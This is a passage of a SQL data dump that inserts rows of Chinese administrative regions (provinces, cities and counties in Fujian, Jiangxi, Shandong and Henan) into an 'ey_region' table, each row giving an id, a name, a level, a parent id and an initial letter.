INSERT INTO `ey_region` VALUES ('16673', '德化县', '3', '16572', 'D');
INSERT INTO `ey_region` VALUES ('16692', '金门县', '3', '16572', 'J');
INSERT INTO `ey_region` VALUES ('16693', '石狮市', '3', '16572', 'S');
INSERT INTO `ey_region` VALUES ('16703', '晋江市', '3', '16572', 'J');
INSERT INTO `ey_region` VALUES ('16726', '南安市', '3', '16572', 'N');
INSERT INTO `ey_region` VALUES ('16754', '漳州市', '2', '16068', 'Z');
INSERT INTO `ey_region` VALUES ('16755', '市辖区', '3', '16754', 'S');
INSERT INTO `ey_region` VALUES ('16756', '芗城区', '3', '16754', 'X');
INSERT INTO `ey_region` VALUES ('16772', '龙文区', '3', '16754', 'L');
INSERT INTO `ey_region` VALUES ('16778', '云霄县', '3', '16754', 'Y');
INSERT INTO `ey_region` VALUES ('16790', '漳浦县', '3', '16754', 'Z');
INSERT INTO `ey_region` VALUES ('16821', '诏安县', '3', '16754', 'Z');
INSERT INTO `ey_region` VALUES ('16842', '长泰县', '3', '16754', 'C');
INSERT INTO `ey_region` VALUES ('16852', '东山县', '3', '16754', 'D');
INSERT INTO `ey_region` VALUES ('16860', '南靖县', '3', '16754', 'N');
INSERT INTO `ey_region` VALUES ('16872', '平和县', '3', '16754', 'P');
INSERT INTO `ey_region` VALUES ('16889', '华安县', '3', '16754', 'H');
INSERT INTO `ey_region` VALUES ('16899', '龙海市', '3', '16754', 'L');
INSERT INTO `ey_region` VALUES ('16924', '南平市', '2', '16068', 'N');
INSERT INTO `ey_region` VALUES ('16925', '市辖区', '3', '16924', 'S');
INSERT INTO `ey_region` VALUES ('16926', '延平区', '3', '16924', 'Y');
INSERT INTO `ey_region` VALUES ('16948', '顺昌县', '3', '16924', 'S');
INSERT INTO `ey_region` VALUES ('16961', '浦城县', '3', '16924', 'P');
INSERT INTO `ey_region` VALUES ('16982', '光泽县', '3', '16924', 'G');
INSERT INTO `ey_region` VALUES ('16991', '松溪县', '3', '16924', 'S');
INSERT INTO `ey_region` VALUES ('17001', '政和县', '3', '16924', 'Z');
INSERT INTO `ey_region` VALUES ('17012', '邵武市', '3', '16924', 'S');
INSERT INTO `ey_region` VALUES ('17033', '武夷山市', '3', '16924', 'W');
INSERT INTO `ey_region` VALUES ('17044', '建瓯市', '3', '16924', 'J');
INSERT INTO `ey_region` VALUES ('17063', '建阳市', '3', '16924', 'J');
INSERT INTO `ey_region` VALUES ('17077', '龙岩市', '2', '16068', 'L');
INSERT INTO `ey_region` VALUES ('17078', '市辖区', '3', '17077', 'S');
INSERT INTO `ey_region` VALUES ('17079', '新罗区', '3', '17077', 'X');
INSERT INTO `ey_region` VALUES ('17099', '长汀县', '3', '17077', 'C');
INSERT INTO `ey_region` VALUES ('17118', '永定县', '3', '17077', 'Y');
INSERT INTO `ey_region` VALUES ('17143', '上杭县', '3', '17077', 'S');
INSERT INTO `ey_region` VALUES ('17166', '武平县', '3', '17077', 'W');
INSERT INTO `ey_region` VALUES ('17184', '连城县', '3', '17077', 'L');
INSERT INTO `ey_region` VALUES ('17202', '漳平市', '3', '17077', 'Z');
INSERT INTO `ey_region` VALUES ('17219', '宁德市 ', '2', '16068', 'N');
INSERT INTO `ey_region` VALUES ('17220', '市辖区', '3', '17219', 'S');
INSERT INTO `ey_region` VALUES ('17221', '蕉城区', '3', '17219', 'J');
INSERT INTO `ey_region` VALUES ('17239', '霞浦县', '3', '17219', 'X');
INSERT INTO `ey_region` VALUES ('17254', '古田县', '3', '17219', 'G');
INSERT INTO `ey_region` VALUES ('17269', '屏南县', '3', '17219', 'P');
INSERT INTO `ey_region` VALUES ('17281', '寿宁县', '3', '17219', 'S');
INSERT INTO `ey_region` VALUES ('17296', '周宁县', '3', '17219', 'Z');
INSERT INTO `ey_region` VALUES ('17306', '柘荣县', '3', '17219', 'Z');
INSERT INTO `ey_region` VALUES ('17316', '福安市', '3', '17219', 'F');
INSERT INTO `ey_region` VALUES ('17341', '福鼎市', '3', '17219', 'F');
INSERT INTO `ey_region` VALUES ('17359', '江西省', '1', '0', 'J');
INSERT INTO `ey_region` VALUES ('17360', '南昌市', '2', '17359', 'N');
INSERT INTO `ey_region` VALUES ('17361', '市辖区', '3', '17360', 'S');
INSERT INTO `ey_region` VALUES ('17362', '东湖区', '3', '17360', 'D');
INSERT INTO `ey_region` VALUES ('17374', '西湖区', '3', '17360', 'X');
INSERT INTO `ey_region` VALUES ('17387', '青云谱区', '3', '17360', 'Q');
INSERT INTO `ey_region` VALUES ('17395', '湾里区', '3', '17360', 'W');
INSERT INTO `ey_region` VALUES ('17402', '青山湖区', '3', '17360', 'Q');
INSERT INTO `ey_region` VALUES ('17420', '南昌县', '3', '17360', 'N');
INSERT INTO `ey_region` VALUES ('17443', '新建县', '3', '17360', 'X');
INSERT INTO `ey_region` VALUES ('17471', '安义县', '3', '17360', 'A');
INSERT INTO `ey_region` VALUES ('17485', '进贤县', '3', '17360', 'J');
INSERT INTO `ey_region` VALUES ('17508', '景德镇市', '2', '17359', 'J');
INSERT INTO `ey_region` VALUES ('17509', '市辖区', '3', '17508', 'S');
INSERT INTO `ey_region` VALUES ('17510', '昌江区', '3', '17508', 'C');
INSERT INTO `ey_region` VALUES ('17534', '珠山区', '3', '17508', 'Z');
INSERT INTO `ey_region` VALUES ('17545', '浮梁县', '3', '17508', 'F');
INSERT INTO `ey_region` VALUES ('17568', '乐平市', '3', '17508', 'L');
INSERT INTO `ey_region` VALUES ('17589', '萍乡市', '2', '17359', 'P');
INSERT INTO `ey_region` VALUES ('17590', '市辖区', '3', '17589', 'S');
INSERT INTO `ey_region` VALUES ('17591', '安源区', '3', '17589', 'A');
INSERT INTO `ey_region` VALUES ('17604', '湘东区', '3', '17589', 'X');
INSERT INTO `ey_region` VALUES ('17616', '莲花县', '3', '17589', 'L');
INSERT INTO `ey_region` VALUES ('17630', '上栗县', '3', '17589', 'S');
INSERT INTO `ey_region` VALUES ('17640', '芦溪县', '3', '17589', 'L');
INSERT INTO `ey_region` VALUES ('17651', '九江市', '2', '17359', 'J');
INSERT INTO `ey_region` VALUES ('17652', '市辖区', '3', '17651', 'S');
INSERT INTO `ey_region` VALUES ('17653', '庐山区', '3', '17651', 'L');
INSERT INTO `ey_region` VALUES ('17667', '浔阳区', '3', '17651', 'X');
INSERT INTO `ey_region` VALUES ('17676', '九江县', '3', '17651', 'J');
INSERT INTO `ey_region` VALUES ('17693', '武宁县', '3', '17651', 'W');
INSERT INTO `ey_region` VALUES ('17714', '修水县', '3', '17651', 'X');
INSERT INTO `ey_region` VALUES ('17751', '永修县', '3', '17651', 'Y');
INSERT INTO `ey_region` VALUES ('17773', '德安县', '3', '17651', 'D');
INSERT INTO `ey_region` VALUES ('17792', '星子县', '3', '17651', 'X');
INSERT INTO `ey_region` VALUES ('17807', '都昌县', '3', '17651', 'D');
INSERT INTO `ey_region` VALUES ('17834', '湖口县', '3', '17651', 'H');
INSERT INTO `ey_region` VALUES ('17849', '彭泽县', '3', '17651', 'P');
INSERT INTO `ey_region` VALUES ('17872', '瑞昌市', '3', '17651', 'R');
INSERT INTO `ey_region` VALUES ('17894', '新余市', '2', '17359', 'X');
INSERT INTO `ey_region` VALUES ('17895', '市辖区', '3', '17894', 'S');
INSERT INTO `ey_region` VALUES ('17896', '渝水区', '3', '17894', 'Y');
INSERT INTO `ey_region` VALUES ('17917', '分宜县', '3', '17894', 'F');
INSERT INTO `ey_region` VALUES ('17934', '鹰潭市', '2', '17359', 'Y');
INSERT INTO `ey_region` VALUES ('17935', '市辖区', '3', '17934', 'S');
INSERT INTO `ey_region` VALUES ('17936', '月湖区', '3', '17934', 'Y');
INSERT INTO `ey_region` VALUES ('17945', '余江县', '3', '17934', 'Y');
INSERT INTO `ey_region` VALUES ('17966', '贵溪市', '3', '17934', 'G');
INSERT INTO `ey_region` VALUES ('17999', '赣州市', '2', '17359', 'G');
INSERT INTO `ey_region` VALUES ('18000', '市辖区', '3', '17999', 'S');
INSERT INTO `ey_region` VALUES ('18001', '章贡区', '3', '17999', 'Z');
INSERT INTO `ey_region` VALUES ('18016', '赣县', '3', '17999', 'G');
INSERT INTO `ey_region` VALUES ('18037', '信丰县', '3', '17999', 'X');
INSERT INTO `ey_region` VALUES ('18055', '大余县', '3', '17999', 'D');
INSERT INTO `ey_region` VALUES ('18068', '上犹县', '3', '17999', 'S');
INSERT INTO `ey_region` VALUES ('18084', '崇义县', '3', '17999', 'C');
INSERT INTO `ey_region` VALUES ('18102', '安远县', '3', '17999', 'A');
INSERT INTO `ey_region` VALUES ('18122', '龙南县', '3', '17999', 'L');
INSERT INTO `ey_region` VALUES ('18139', '定南县', '3', '17999', 'D');
INSERT INTO `ey_region` VALUES ('18148', '全南县', '3', '17999', 'Q');
INSERT INTO `ey_region` VALUES ('18161', '宁都县', '3', '17999', 'N');
INSERT INTO `ey_region` VALUES ('18187', '于都县', '3', '17999', 'Y');
INSERT INTO `ey_region` VALUES ('18212', '兴国县', '3', '17999', 'X');
INSERT INTO `ey_region` VALUES ('18239', '会昌县', '3', '17999', 'H');
INSERT INTO `ey_region` VALUES ('18260', '寻乌县', '3', '17999', 'X');
INSERT INTO `ey_region` VALUES ('18276', '石城县', '3', '17999', 'S');
INSERT INTO `ey_region` VALUES ('18287', '瑞金市', '3', '17999', 'R');
INSERT INTO `ey_region` VALUES ('18306', '南康市', '3', '17999', 'N');
INSERT INTO `ey_region` VALUES ('18330', '吉安市', '2', '17359', 'J');
INSERT INTO `ey_region` VALUES ('18331', '市辖区', '3', '18330', 'S');
INSERT INTO `ey_region` VALUES ('18332', '吉州区', '3', '18330', 'J');
INSERT INTO `ey_region` VALUES ('18345', '青原区', '3', '18330', 'Q');
INSERT INTO `ey_region` VALUES ('18356', '吉安县', '3', '18330', 'J');
INSERT INTO `ey_region` VALUES ('18378', '吉水县', '3', '18330', 'J');
INSERT INTO `ey_region` VALUES ('18398', '峡江县', '3', '18330', 'X');
INSERT INTO `ey_region` VALUES ('18411', '新干县', '3', '18330', 'X');
INSERT INTO `ey_region` VALUES ('18429', '永丰县', '3', '18330', 'Y');
INSERT INTO `ey_region` VALUES ('18454', '泰和县', '3', '18330', 'T');
INSERT INTO `ey_region` VALUES ('18483', '遂川县', '3', '18330', 'S');
INSERT INTO `ey_region` VALUES ('18510', '万安县', '3', '18330', 'W');
INSERT INTO `ey_region` VALUES ('18529', '安福县', '3', '18330', 'A');
INSERT INTO `ey_region` VALUES ('18550', '永新县', '3', '18330', 'Y');
INSERT INTO `ey_region` VALUES ('18575', '井冈山市', '3', '18330', 'J');
INSERT INTO `ey_region` VALUES ('18598', '宜春市', '2', '17359', 'Y');
INSERT INTO `ey_region` VALUES ('18599', '市辖区', '3', '18598', 'S');
INSERT INTO `ey_region` VALUES ('18600', '袁州区', '3', '18598', 'Y');
INSERT INTO `ey_region` VALUES ('18639', '奉新县', '3', '18598', 'F');
INSERT INTO `ey_region` VALUES ('18659', '万载县', '3', '18598', 'W');
INSERT INTO `ey_region` VALUES ('18678', '上高县', '3', '18598', 'S');
INSERT INTO `ey_region` VALUES ('18696', '宜丰县', '3', '18598', 'Y');
INSERT INTO `ey_region` VALUES ('18714', '靖安县', '3', '18598', 'J');
INSERT INTO `ey_region` VALUES ('18727', '铜鼓县', '3', '18598', 'T');
INSERT INTO `ey_region` VALUES ('18741', '丰城市', '3', '18598', 'F');
INSERT INTO `ey_region` VALUES ('18777', '樟树市', '3', '18598', 'Z');
INSERT INTO `ey_region` VALUES ('18799', '高安市', '3', '18598', 'G');
INSERT INTO `ey_region` VALUES ('18829', '抚州市', '2', '17359', 'F');
INSERT INTO `ey_region` VALUES ('18830', '市辖区', '3', '18829', 'S');
INSERT INTO `ey_region` VALUES ('18831', '临川区', '3', '18829', 'L');
INSERT INTO `ey_region` VALUES ('18869', '南城县', '3', '18829', 'N');
INSERT INTO `ey_region` VALUES ('18882', '黎川县', '3', '18829', 'L');
INSERT INTO `ey_region` VALUES ('18900', '南丰县', '3', '18829', 'N');
INSERT INTO `ey_region` VALUES ('18915', '崇仁县', '3', '18829', 'C');
INSERT INTO `ey_region` VALUES ('18931', '乐安县', '3', '18829', 'L');
INSERT INTO `ey_region` VALUES ('18949', '宜黄县', '3', '18829', 'Y');
INSERT INTO `ey_region` VALUES ('18965', '金溪县', '3', '18829', 'J');
INSERT INTO `ey_region` VALUES ('18980', '资溪县', '3', '18829', 'Z');
INSERT INTO `ey_region` VALUES ('18988', '东乡县', '3', '18829', 'D');
INSERT INTO `ey_region` VALUES ('19010', '广昌县', '3', '18829', 'G');
INSERT INTO `ey_region` VALUES ('19024', '上饶市', '2', '17359', 'S');
INSERT INTO `ey_region` VALUES ('19025', '市辖区', '3', '19024', 'S');
INSERT INTO `ey_region` VALUES ('19026', '信州区', '3', '19024', 'X');
INSERT INTO `ey_region` VALUES ('19038', '上饶县', '3', '19024', 'S');
INSERT INTO `ey_region` VALUES ('19062', '广丰县', '3', '19024', 'G');
INSERT INTO `ey_region` VALUES ('19088', '玉山县', '3', '19024', 'Y');
INSERT INTO `ey_region` VALUES ('19108', '铅山县', '3', '19024', 'Q');
INSERT INTO `ey_region` VALUES ('19136', '横峰县', '3', '19024', 'H');
INSERT INTO `ey_region` VALUES ('19151', '弋阳县', '3', '19024', 'Y');
INSERT INTO `ey_region` VALUES ('19171', '余干县', '3', '19024', 'Y');
INSERT INTO `ey_region` VALUES ('19202', '鄱阳县', '3', '19024', 'P');
INSERT INTO `ey_region` VALUES ('19234', '万年县', '3', '19024', 'W');
INSERT INTO `ey_region` VALUES ('19248', '婺源县', '3', '19024', 'W');
INSERT INTO `ey_region` VALUES ('19265', '德兴市', '3', '19024', 'D');
INSERT INTO `ey_region` VALUES ('19280', '山东省', '1', '0', 'S');
INSERT INTO `ey_region` VALUES ('19281', '济南市', '2', '19280', 'J');
INSERT INTO `ey_region` VALUES ('19282', '市辖区', '3', '19281', 'S');
INSERT INTO `ey_region` VALUES ('19283', '历下区', '3', '19281', 'L');
INSERT INTO `ey_region` VALUES ('19295', '市中区', '3', '19281', 'S');
INSERT INTO `ey_region` VALUES ('19311', '槐荫区', '3', '19281', 'H');
INSERT INTO `ey_region` VALUES ('19326', '天桥区', '3', '19281', 'T');
INSERT INTO `ey_region` VALUES ('19342', '历城区', '3', '19281', 'L');
INSERT INTO `ey_region` VALUES ('19359', '长清区', '3', '19281', 'C');
INSERT INTO `ey_region` VALUES ('19370', '平阴县', '3', '19281', 'P');
INSERT INTO `ey_region` VALUES ('19378', '济阳县', '3', '19281', 'J');
INSERT INTO `ey_region` VALUES ('19387', '商河县', '3', '19281', 'S');
INSERT INTO `ey_region` VALUES ('19400', '章丘市', '3', '19281', 'Z');
INSERT INTO `ey_region` VALUES ('19421', '青岛市', '2', '19280', 'Q');
INSERT INTO `ey_region` VALUES ('19422', '市辖区', '3', '19421', 'S');
INSERT INTO `ey_region` VALUES ('19423', '市南区', '3', '19421', 'S');
INSERT INTO `ey_region` VALUES ('19438', '市北区', '3', '19421', 'S');
INSERT INTO `ey_region` VALUES ('19456', '四方区', '3', '19421', 'S');
INSERT INTO `ey_region` VALUES ('19464', '黄岛区', '3', '19421', 'H');
INSERT INTO `ey_region` VALUES ('19471', '崂山区', '3', '19421', 'L');
INSERT INTO `ey_region` VALUES ('19476', '李沧区', '3', '19421', 'L');
INSERT INTO `ey_region` VALUES ('19488', '城阳区', '3', '19421', 'C');
INSERT INTO `ey_region` VALUES ('19497', '胶州市', '3', '19421', 'J');
INSERT INTO `ey_region` VALUES ('19516', '即墨市', '3', '19421', 'J');
INSERT INTO `ey_region` VALUES ('19540', '平度市', '3', '19421', 'P');
INSERT INTO `ey_region` VALUES ('19572', '胶南市', '3', '19421', 'J');
INSERT INTO `ey_region` VALUES ('19590', '莱西市', '3', '19421', 'L');
INSERT INTO `ey_region` VALUES ('19608', '淄博市', '2', '19280', 'Z');
INSERT INTO `ey_region` VALUES ('19609', '市辖区', '3', '19608', 'S');
INSERT INTO `ey_region` VALUES ('19610', '淄川区', '3', '19608', 'Z');
INSERT INTO `ey_region` VALUES ('19632', '张店区', '3', '19608', 'Z');
INSERT INTO `ey_region` VALUES ('19649', '博山区', '3', '19608', 'B');
INSERT INTO `ey_region` VALUES ('19663', '临淄区', '3', '19608', 'L');
INSERT INTO `ey_region` VALUES ('19678', '周村区', '3', '19608', 'Z');
INSERT INTO `ey_region` VALUES ('19688', '桓台县', '3', '19608', 'H');
INSERT INTO `ey_region` VALUES ('19700', '高青县', '3', '19608', 'G');
INSERT INTO `ey_region` VALUES ('19710', '沂源县', '3', '19608', 'Y');
INSERT INTO `ey_region` VALUES ('19724', '枣庄市', '2', '19280', 'Z');
INSERT INTO `ey_region` VALUES ('19725', '市辖区', '3', '19724', 'S');
INSERT INTO `ey_region` VALUES ('19726', '市中区', '3', '19724', 'S');
INSERT INTO `ey_region` VALUES ('19738', '薛城区', '3', '19724', 'X');
INSERT INTO `ey_region` VALUES ('19748', '峄城区', '3', '19724', 'Y');
INSERT INTO `ey_region` VALUES ('19756', '台儿庄区', '3', '19724', 'T');
INSERT INTO `ey_region` VALUES ('19763', '山亭区', '3', '19724', 'S');
INSERT INTO `ey_region` VALUES ('19774', '滕州市', '3', '19724', 'T');
INSERT INTO `ey_region` VALUES ('19796', '东营市', '2', '19280', 'D');
INSERT INTO `ey_region` VALUES ('19797', '市辖区', '3', '19796', 'S');
INSERT INTO `ey_region` VALUES ('19798', '东营区', '3', '19796', 'D');
INSERT INTO `ey_region` VALUES ('19809', '河口区', '3', '19796', 'H');
INSERT INTO `ey_region` VALUES ('19817', '垦利县', '3', '19796', 'K');
INSERT INTO `ey_region` VALUES ('19825', '利津县', '3', '19796', 'L');
INSERT INTO `ey_region` VALUES ('19835', '广饶县', '3', '19796', 'G');
INSERT INTO `ey_region` VALUES ('19846', '烟台市', '2', '19280', 'Y');
INSERT INTO `ey_region` VALUES ('19847', '市辖区', '3', '19846', 'S');
INSERT INTO `ey_region` VALUES ('19848', '芝罘区', '3', '19846', 'Z');
INSERT INTO `ey_region` VALUES ('19861', '福山区', '3', '19846', 'F');
INSERT INTO `ey_region` VALUES ('19873', '牟平区', '3', '19846', 'M');
INSERT INTO `ey_region` VALUES ('19887', '莱山区', '3', '19846', 'L');
INSERT INTO `ey_region` VALUES ('19893', '长岛县', '3', '19846', 'C');
INSERT INTO `ey_region` VALUES ('19902', '龙口市', '3', '19846', 'L');
INSERT INTO `ey_region` VALUES ('19916', '莱阳市', '3', '19846', 'L');
INSERT INTO `ey_region` VALUES ('19935', '莱州市', '3', '19846', 'L');
INSERT INTO `ey_region` VALUES ('19952', '蓬莱市', '3', '19846', 'P');
INSERT INTO `ey_region` VALUES ('19965', '招远市', '3', '19846', 'Z');
INSERT INTO `ey_region` VALUES ('19980', '栖霞市', '3', '19846', 'Q');
INSERT INTO `ey_region` VALUES ('19996', '海阳市', '3', '19846', 'H');
INSERT INTO `ey_region` VALUES ('20012', '潍坊市', '2', '19280', 'W');
INSERT INTO `ey_region` VALUES ('20013', '市辖区', '3', '20012', 'S');
INSERT INTO `ey_region` VALUES ('20014', '潍城区', '3', '20012', 'W');
INSERT INTO `ey_region` VALUES ('20023', '寒亭区', '3', '20012', 'H');
INSERT INTO `ey_region` VALUES ('20034', '坊子区', '3', '20012', 'F');
INSERT INTO `ey_region` VALUES ('20043', '奎文区', '3', '20012', 'K');
INSERT INTO `ey_region` VALUES ('20055', '临朐县', '3', '20012', 'L');
INSERT INTO `ey_region` VALUES ('20074', '昌乐县', '3', '20012', 'C');
INSERT INTO `ey_region` VALUES ('20091', '青州市', '3', '20012', 'Q');
INSERT INTO `ey_region` VALUES ('20113', '诸城市', '3', '20012', 'Z');
INSERT INTO `ey_region` VALUES ('20137', '寿光市', '3', '20012', 'S');
INSERT INTO `ey_region` VALUES ('20155', '安丘市', '3', '20012', 'A');
INSERT INTO `ey_region` VALUES ('20179', '高密市', '3', '20012', 'G');
INSERT INTO `ey_region` VALUES ('20200', '昌邑市', '3', '20012', 'C');
INSERT INTO `ey_region` VALUES ('20216', '济宁市', '2', '19280', 'J');
INSERT INTO `ey_region` VALUES ('20217', '市辖区', '3', '20216', 'S');
INSERT INTO `ey_region` VALUES ('20218', '市中区', '3', '20216', 'S');
INSERT INTO `ey_region` VALUES ('20227', '任城区', '3', '20216', 'R');
INSERT INTO `ey_region` VALUES ('20257', '鱼台县', '3', '20216', 'Y');
INSERT INTO `ey_region` VALUES ('20268', '金乡县', '3', '20216', 'J');
INSERT INTO `ey_region` VALUES ('20282', '嘉祥县', '3', '20216', 'J');
INSERT INTO `ey_region` VALUES ('20298', '汶上县', '3', '20216', 'W');
INSERT INTO `ey_region` VALUES ('20313', '泗水县', '3', '20216', 'S');
INSERT INTO `ey_region` VALUES ('20327', '梁山县', '3', '20216', 'L');
INSERT INTO `ey_region` VALUES ('20342', '曲阜市', '3', '20216', 'Q');
INSERT INTO `ey_region` VALUES ('20355', '兖州市', '3', '20216', 'Y');
INSERT INTO `ey_region` VALUES ('20368', '邹城市', '3', '20216', 'Z');
INSERT INTO `ey_region` VALUES ('20386', '泰安市', '2', '19280', 'T');
INSERT INTO `ey_region` VALUES ('20387', '市辖区', '3', '20386', 'S');
INSERT INTO `ey_region` VALUES ('20388', '泰山区', '3', '20386', 'T');
INSERT INTO `ey_region` VALUES ('20397', '岱岳区', '3', '20386', 'D');
INSERT INTO `ey_region` VALUES ('20416', '宁阳县', '3', '20386', 'N');
INSERT INTO `ey_region` VALUES ('20429', '东平县', '3', '20386', 'D');
INSERT INTO `ey_region` VALUES ('20444', '新泰市', '3', '20386', 'X');
INSERT INTO `ey_region` VALUES ('20465', '肥城市', '3', '20386', 'F');
INSERT INTO `ey_region` VALUES ('20480', '威海市', '2', '19280', 'W');
INSERT INTO `ey_region` VALUES ('20481', '市辖区', '3', '20480', 'S');
INSERT INTO `ey_region` VALUES ('20482', '环翠区', '3', '20480', 'H');
INSERT INTO `ey_region` VALUES ('20500', '文登市', '3', '20480', 'W');
INSERT INTO `ey_region` VALUES ('20519', '荣成市', '3', '20480', 'R');
INSERT INTO `ey_region` VALUES ('20542', '乳山市', '3', '20480', 'R');
INSERT INTO `ey_region` VALUES ('20558', '日照市', '2', '19280', 'R');
INSERT INTO `ey_region` VALUES ('20559', '市辖区', '3', '20558', 'S');
INSERT INTO `ey_region` VALUES ('20560', '东港区', '3', '20558', 'D');
INSERT INTO `ey_region` VALUES ('20573', '岚山区', '3', '20558', 'L');
INSERT INTO `ey_region` VALUES ('20583', '五莲县', '3', '20558', 'W');
INSERT INTO `ey_region` VALUES ('20596', '莒县', '3', '20558', 'J');
INSERT INTO `ey_region` VALUES ('20618', '莱芜市', '2', '19280', 'L');
INSERT INTO `ey_region` VALUES ('20619', '市辖区', '3', '20618', 'S');
INSERT INTO `ey_region` VALUES ('20620', '莱城区', '3', '20618', 'L');
INSERT INTO `ey_region` VALUES ('20636', '钢城区', '3', '20618', 'G');
INSERT INTO `ey_region` VALUES ('20642', '临沂市', '2', '19280', 'L');
INSERT INTO `ey_region` VALUES ('20643', '临沂市辖区', '3', '20642', 'L');
INSERT INTO `ey_region` VALUES ('20644', '兰山区', '3', '20642', 'L');
INSERT INTO `ey_region` VALUES ('20656', '罗庄区', '3', '20642', 'L');
INSERT INTO `ey_region` VALUES ('20665', '河东区', '3', '20642', 'H');
INSERT INTO `ey_region` VALUES ('20678', '沂南县', '3', '20642', 'Y');
INSERT INTO `ey_region` VALUES ('20696', '郯城县', '3', '20642', 'T');
INSERT INTO `ey_region` VALUES ('20714', '沂水县', '3', '20642', 'Y');
INSERT INTO `ey_region` VALUES ('20734', '苍山县', '3', '20642', 'C');
INSERT INTO `ey_region` VALUES ('20756', '费县', '3', '20642', 'F');
INSERT INTO `ey_region` VALUES ('20775', '平邑县', '3', '20642', 'P');
INSERT INTO `ey_region` VALUES ('20792', '莒南县', '3', '20642', 'J');
INSERT INTO `ey_region` VALUES ('20811', '蒙阴县', '3', '20642', 'M');
INSERT INTO `ey_region` VALUES ('20823', '临沭县', '3', '20642', 'L');
INSERT INTO `ey_region` VALUES ('20836', '德州市', '2', '19280', 'D');
INSERT INTO `ey_region` VALUES ('20837', '市辖区', '3', '20836', 'S');
INSERT INTO `ey_region` VALUES ('20838', '德城区', '3', '20836', 'D');
INSERT INTO `ey_region` VALUES ('20850', '陵县', '3', '20836', 'L');
INSERT INTO `ey_region` VALUES ('20864', '宁津县', '3', '20836', 'N');
INSERT INTO `ey_region` VALUES ('20876', '庆云县', '3', '20836', 'Q');
INSERT INTO `ey_region` VALUES ('20886', '临邑县', '3', '20836', 'L');
INSERT INTO `ey_region` VALUES ('20899', '齐河县', '3', '20836', 'Q');
INSERT INTO `ey_region` VALUES ('20914', '平原县', '3', '20836', 'P');
INSERT INTO `ey_region` VALUES ('20927', '夏津县', '3', '20836', 'X');
INSERT INTO `ey_region` VALUES ('20942', '武城县', '3', '20836', 'W');
INSERT INTO `ey_region` VALUES ('20952', '乐陵市', '3', '20836', 'L');
INSERT INTO `ey_region` VALUES ('20969', '禹城市', '3', '20836', 'Y');
INSERT INTO `ey_region` VALUES ('20981', '聊城市', '2', '19280', 'L');
INSERT INTO `ey_region` VALUES ('20982', '市辖区', '3', '20981', 'S');
INSERT INTO `ey_region` VALUES ('20983', '东昌府区', '3', '20981', 'D');
INSERT INTO `ey_region` VALUES ('21004', '阳谷县', '3', '20981', 'Y');
INSERT INTO `ey_region` VALUES ('21023', '莘县', '3', '20981', 'S');
INSERT INTO `ey_region` VALUES ('21046', '茌平县', '3', '20981', 'C');
INSERT INTO `ey_region` VALUES ('21063', '东阿县', '3', '20981', 'D');
INSERT INTO `ey_region` VALUES ('21075', '冠县', '3', '20981', 'G');
INSERT INTO `ey_region` VALUES ('21093', '高唐县', '3', '20981', 'G');
INSERT INTO `ey_region` VALUES ('21106', '临清市', '3', '20981', 'L');
INSERT INTO `ey_region` VALUES ('21123', '滨州市', '2', '19280', 'B');
INSERT INTO `ey_region` VALUES ('21124', '市辖区', '3', '21123', 'S');
INSERT INTO `ey_region` VALUES ('21125', '滨城区', '3', '21123', 'B');
INSERT INTO `ey_region` VALUES ('21141', '惠民县', '3', '21123', 'H');
INSERT INTO `ey_region` VALUES ('21156', '阳信县', '3', '21123', 'Y');
INSERT INTO `ey_region` VALUES ('21166', '无棣县', '3', '21123', 'W');
INSERT INTO `ey_region` VALUES ('21178', '沾化县', '3', '21123', 'Z');
INSERT INTO `ey_region` VALUES ('21190', '博兴县', '3', '21123', 'B');
INSERT INTO `ey_region` VALUES ('21201', '邹平县', '3', '21123', 'Z');
INSERT INTO `ey_region` VALUES ('21218', '菏泽市', '2', '19280', 'H');
INSERT INTO `ey_region` VALUES ('21219', '市辖区', '3', '21218', 'S');
INSERT INTO `ey_region` VALUES ('21220', '牡丹区', '3', '21218', 'M');
INSERT INTO `ey_region` VALUES ('21245', '曹县', '3', '21218', 'C');
INSERT INTO `ey_region` VALUES ('21271', '单县', '3', '21218', 'D');
INSERT INTO `ey_region` VALUES ('21292', '成武县', '3', '21218', 'C');
INSERT INTO `ey_region` VALUES ('21305', '巨野县', '3', '21218', 'J');
INSERT INTO `ey_region` VALUES ('21322', '郓城县', '3', '21218', 'Y');
INSERT INTO `ey_region` VALUES ('21344', '鄄城县', '3', '21218', 'J');
INSERT INTO `ey_region` VALUES ('21361', '定陶县', '3', '21218', 'D');
INSERT INTO `ey_region` VALUES ('21373', '东明县', '3', '21218', 'D');
INSERT INTO `ey_region` VALUES ('21387', '河南省', '1', '0', 'H');
INSERT INTO `ey_region` VALUES ('21388', '郑州市', '2', '21387', 'Z');
INSERT INTO `ey_region` VALUES ('21389', '市辖区', '3', '21388', 'S');
INSERT INTO `ey_region` VALUES ('21390', '中原区', '3', '21388', 'Z');
INSERT INTO `ey_region` VALUES ('21404', '二七区', '3', '21388', 'E');
INSERT INTO `ey_region` VALUES ('21420', '管城回族区', '3', '21388', 'G');
INSERT INTO `ey_region` VALUES ('21435', '金水区', '3', '21388', 'J');
INSERT INTO `ey_region` VALUES ('21453', '上街区', '3', '21388', 'S');
INSERT INTO `ey_region` VALUES ('21460', '惠济区', '3', '21388', 'H');
INSERT INTO `ey_region` VALUES ('21469', '中牟县', '3', '21388', 'Z');
INSERT INTO `ey_region` VALUES ('21487', '巩义市', '3', '21388', 'G');
INSERT INTO `ey_region` VALUES ('21508', '荥阳市', '3', '21388', 'X');
INSERT INTO `ey_region` VALUES ('21523', '新密市', '3', '21388', 'X');
INSERT INTO `ey_region` VALUES ('21542', '新郑市', '3', '21388', 'X');
INSERT INTO `ey_region` VALUES ('21558', '登封市', '3', '21388', 'D');
INSERT INTO `ey_region` VALUES ('21575', '开封市', '2', '21387', 'K');
INSERT INTO `ey_region` VALUES ('21576', '市辖区', '3', '21575', 'S');
INSERT INTO `ey_region` VALUES ('21577', '龙亭区', '3', '21575', 'L');
INSERT INTO `ey_region` VALUES ('21584', '顺河区', '3', '21575', 'S');
INSERT INTO `ey_region` VALUES ('21593', '鼓楼区', '3', '21575', 'G');
INSERT INTO `ey_region` VALUES ('21602', '禹王台区', '3', '21575', 'Y');
INSERT INTO `ey_region` VALUES ('21610', '金明区', '3', '21575', 'J');
INSERT INTO `ey_region` VALUES ('21618', '杞县', '3', '21575', 'Q');
INSERT INTO `ey_region` VALUES ('21640', '通许县', '3', '21575', 'T');
INSERT INTO `ey_region` VALUES ('21653', '尉氏县', '3', '21575', 'W');
INSERT INTO `ey_region` VALUES ('21671', '开封县', '3', '21575', 'K');
INSERT INTO `ey_region` VALUES ('21687', '兰考县', '3', '21575', 'L');
INSERT INTO `ey_region` VALUES ('21711', '洛阳市', '2', '21387', 'L');
